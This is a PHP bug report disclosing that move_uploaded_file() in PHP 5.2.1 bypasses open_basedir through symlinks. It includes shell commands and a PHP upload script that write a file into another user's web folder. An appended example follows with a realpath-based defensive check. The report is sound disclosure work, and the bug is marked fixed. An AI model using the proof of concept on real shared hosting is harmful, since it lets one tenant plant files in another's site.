ID:               40931
Updated by:       [EMAIL PROTECTED]
Reported By:      vladimir at petrov dot ks dot ua
-Status:          Assigned
+Status:          Closed
Bug Type:         Safe Mode/open_basedir
Operating System: Linux
PHP Version:      5.2.1
Assigned To:      tony2001
New Comment:

This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

Thank you for the report, and for helping us make PHP better.


Previous Comments:
------------------------------------------------------------------------

[2007-03-27 21:19:24] vladimir at petrov dot ks dot ua

I have sent access information to my server to [EMAIL PROTECTED]
I see this bug really working.

------------------------------------------------------------------------

[2007-03-27 20:33:26] [EMAIL PROTECTED]

Cannot reproduce.

------------------------------------------------------------------------

[2007-03-27 19:59:46] vladimir at petrov dot ks dot ua

open_basedir is actually used. If I try to write directly to the target
directory with
move_uploaded_file($_FILES["userfile"]["tmp_name"],"/home/user2/public_html/file.ext")
I get the proper error message in the browser and in the Apache error log.

------------------------------------------------------------------------

[2007-03-27 18:40:17] [EMAIL PROTECTED]

Make sure the open_basedir option is actually used and not overridden in
another way.

------------------------------------------------------------------------

[2007-03-27 18:30:13] vladimir at petrov dot ks dot ua

Description:
------------
A user can bypass the open_basedir restriction with move_uploaded_file() if
the target file path is a symlink to any directory.

Reproduce code:
---------------
user1 will upload a file to user2's /home/user2/public_html folder.

We have in /etc/passwd:
user1:x:32001:32001::/home/user1:/bin/bash
user2:x:32002:32002::/home/user2:/bin/bash

The target folder is writable by anybody:
# ls -lA /home/user2
drwxrwxrwx  2 user2 user2 4096 Mar 27 17:31 public_html/

Apache has mod_php installed.
Apache config for user1:
<VirtualHost xxx.xxx.xxx.xxx>
    ServerName user1.xxxxxxx.com
    DocumentRoot /home/user1/public_html
    User user1
    php_admin_value open_basedir "/home/user1"
</VirtualHost>

User user1 can do something like:
$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body>
<?
if ( isset($_FILES["userfile"]) ) {
    echo "Upload ";
    if (move_uploaded_file($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext"))
        echo "ok";
    else
        echo "failed";
}
?>
<form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data">
<input type="file" name="userfile">
<input type="submit">
</form>
</body></html>' > upload.php

Expected result:
----------------
If we access http://user1.xxxxxxx.com/upload.php, after the file upload we
expect the message "Upload failed" and no file
/home/user2/public_html/file.ext in the target folder.

Actual result:
--------------
If we access http://user1.xxxxxxx.com/upload.php, after the file upload we
get the message "Upload ok" and the file /home/user2/public_html/file.ext
exists in the target folder.

------------------------------------------------------------------------

-- 
Edit this bug report at http://bugs.php.net/?id=40931&edit=1
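
The report turns on the difference between the textual destination path and the path it resolves to. The following is an added example, not code from the bug report or from the PHP fix: an application-level check that resolves symlinks before accepting an upload destination. The function name resolve_inside_base() and the temp-directory layout are assumptions made for the demonstration.

```php
<?php
// Added example, not from the bug report. All names and paths are constructed.

// Return the canonical destination if $dest stays inside $base once symlinks
// are resolved, or false. The file may not exist yet, so the parent directory
// is what gets resolved.
function resolve_inside_base($dest, $base)
{
    $realBase = realpath($base);
    $realDir  = realpath(dirname($dest));
    if ($realBase === false || $realDir === false) {
        return false;
    }
    $target = $realDir . DIRECTORY_SEPARATOR . basename($dest);
    if (is_link($target)) {
        return false; // final component must not be a symlink either
    }
    // Trailing separator keeps /home/user1 from matching /home/user10.
    $prefix = rtrim($realBase, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($realDir . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $target;
}

// Constructed layout mirroring the report, built under the temp directory.
$root = sys_get_temp_dir() . '/obd_demo_' . getmypid();
mkdir("$root/user1/public_html", 0700, true);
mkdir("$root/user2/public_html", 0700, true);
symlink("$root/user2/public_html", "$root/user1/public_html/user2_public_html");

$base    = "$root/user1";
$viaLink = "$base/public_html/user2_public_html/file.ext";
$direct  = "$base/public_html/file.ext";

// A purely textual prefix test accepts the symlinked path; the resolved check does not.
echo 'textual prefix, via symlink: ', var_export(strpos($viaLink, "$base/") === 0, true), "\n";
echo 'resolved check, via symlink: ', var_export(resolve_inside_base($viaLink, $base), true), "\n";
echo 'resolved check, direct path: ', var_export(resolve_inside_base($direct, $base), true), "\n";

// Remove the demo tree.
unlink("$base/public_html/user2_public_html");
rmdir("$base/public_html"); rmdir($base);
rmdir("$root/user2/public_html"); rmdir("$root/user2"); rmdir($root);
```

In an upload handler the returned path is what would be passed to move_uploaded_file(). The check and the move are not atomic, so the destination tree should also not be writable by other accounts.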